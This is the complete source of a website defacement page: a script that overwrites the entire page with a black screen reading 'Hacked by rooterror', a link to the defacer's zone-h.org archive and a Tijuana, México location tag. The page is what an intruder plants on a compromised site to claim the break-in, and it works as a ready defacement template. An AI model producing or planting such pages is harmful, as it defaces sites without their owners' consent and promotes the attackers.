<script>document.documentElement.innerHTML = unescape("<!DOCTYPE html>
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<title>./root ownz you</title>
<style type="text/css">
@import url('https://fonts.googleapis.com/css2?family=Gloria+Hallelujah&family=Russo+One&family=Geo&family=Iceland&display=swap');
body {
overflow:hidden;
background-color:rgb(0,0,0);
color:rgb(255,250,250);
}
#center {
text-align:center;
position:absolute;
top:35%;
right:0;
bottom:0;
left:0;
}
br {   
content:"";
margin:1em;
display:block;
margin-bottom:-20px; 
}
.code {
font-size:60px;
font-weight:500;
font-family:Russo One;
color:rgb(255,0,0);
text-shadow:1px 1px 25px rgb(100,30,0);
}
a:link {
text-decoration:none;
}
@-webkit-keyframes blinker {
  from {opacity: 1.0;}
  to {opacity: 0.0;}
}
.blink{
	text-decoration: blink;
	-webkit-animation-name: blinker;
	-webkit-animation-duration: 1s;
	-webkit-animation-iteration-count:infinite;
	-webkit-animation-timing-function:ease-in-out;
	-webkit-animation-direction: alternate;
}
</style>
</head>
<body>
<div id="center">
<p>
<div class="code" id="headline">Hacked by rooterror</div>
<br/>
<font style="font-size: 15px;font-family:Gloria Hallelujah;text-shadow:1px 1px 5px rgb(255,250,250);"><a href="http://www.zone-h.org/archive/defacer=rooterror" target="_blank" style="color:rgb(192,192,192);" id="text">http://www.zone-h.org/archive/defacer=rooterror</a></font>
</p>
<p>
<font class="blink" face="Iceland" style="color:#525252;text-shadow:0px 0px 10px #696969;font-size:15px;">Tijuana, Baja California, México</font>
</div>
</body>
</html>");</script>
